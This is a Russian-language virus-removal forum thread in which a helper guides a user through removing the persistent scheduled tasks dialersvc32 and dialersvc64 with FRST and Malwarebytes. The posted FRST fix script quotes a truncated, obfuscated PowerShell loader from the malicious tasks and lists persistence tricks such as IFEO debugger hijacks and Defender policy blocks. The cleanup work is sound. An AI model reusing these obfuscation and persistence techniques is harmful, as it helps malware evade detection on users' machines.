Перейти к содержанию
Правила раздела

dialersvc32.job и dialersvc64.job не удаляется

yenagry

Автор yenagry
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

yenagry

yenagry

Опубликовано
Опубликовано (изменено)

Здравствуйте, компьютер стал странно себя вести, проверил на вирусы и нашел эти два dialersvc32.job и dialersvc64.job, они не удаляются
 

fff.png

Изменено пользователем yenagry
Sandor

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Дополнительно, пожалуйста:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Новую тему создавать не нужно, продолжаем здесь.

kmscom

kmscom

Опубликовано
Опубликовано
Сообщение от модератора kmscom
Темы объединены 

 

  • Like (+1) 1
yenagry

yenagry

Опубликовано
  • Автор
Опубликовано
1 час назад, Sandor сказал:

Здравствуйте!

 

Дополнительно, пожалуйста:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Новую тему создавать не нужно, продолжаем здесь.

Addition.txtFRST.txt

Sandor

Sandor

Опубликовано
Опубликовано

Не нужно полностью цитировать предыдущее сообщение, это ухудшает читаемость темы. Пишите в нижнем поле быстрого ответа.

 

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус. Закройте все запущенные программы.
  • Выделите следующий код: 
    Start::
CloseProcesses:
SystemRestore: On
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Ограничение <==== ВНИМАНИЕ
IFEO\CompatTelRunner.exe: [Debugger] %windir%\System32\taskkill.exe
IFEO\DeviceCensus.exe: [Debugger] %windir%\system32\taskkill.exe
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ
Task: {490718A0-CB7B-4CB6-975D-D8313537F963} - System32\Tasks\GoogleUpdateTaskMachineQC => C:\Program Files\Google\Chrome\updater.exe (Доступ не разрешён) <==== ВНИМАНИЕ <==== ВНИМАНИЕ
Task: {6DE4F610-E924-4368-9C92-302F4D74F2B8} - System32\Tasks\dialersvc64 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов). <==== ВНИМАНИЕ
Task: {89EDDD67-6844-49EF-866C-3763A0D1CF54} - System32\Tasks\dialersvc32 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов). <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1254346534-2192647422-3779847561-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
FirewallRules: [{20DEA858-06DB-4463-A361-80A4E328AE3E}] => (Allow) LPort=1688
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
EmptyTemp:
Reboot:
End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Sandor

Sandor

Опубликовано
Опубликовано

Хорошо.

Дополнительно, пожалуйста:

Скачайте Malwarebytes v.4 (или с зеркала). Установите и запустите.
(На предложение активации лицензии ответьте "Позже" и "Использовать бесплатную версию").
Запустите Проверку и дождитесь её окончания.
Самостоятельно ничего не помещайте в карантин!!!
Нажмите кнопку "Сохранить результаты - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.
 

yenagry

yenagry

Опубликовано
  • Автор
Опубликовано

первая ссылка не работает, с зеркала скачал архив, распаковал и запустил приложение, там выдало такие ошибкиimage.thumb.png.9a7c5d5a5e7f278bf0c9094f391e4386.png

Sandor

Sandor

Опубликовано
Опубликовано

Вероятно вы пытаетесь запустить прямо из архива, что неверно.

Извлеките исполняемый файл из архива и только потом запускайте.

(Только что проверил, скачивается и извлекается успешно).

Sandor

Sandor

Опубликовано
Опубликовано

Всё, что найдено (кроме вашего активатора) удалите (поместите в карантин).

Перезагрузите компьютер и повторите ещё раз сканирование. Новый лог покажите.

yenagry

yenagry

Опубликовано
  • Автор
Опубликовано

Извините, не понимаю, что из них является моим активатором?
image.thumb.png.462a31929a0d6cbeea6eaff63f58c07a.png

Sandor

Sandor

Опубликовано
Опубликовано

Последние две строки. Если вы его не устанавливали самостоятельно, тоже удалите.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем
×
×
  • Создать...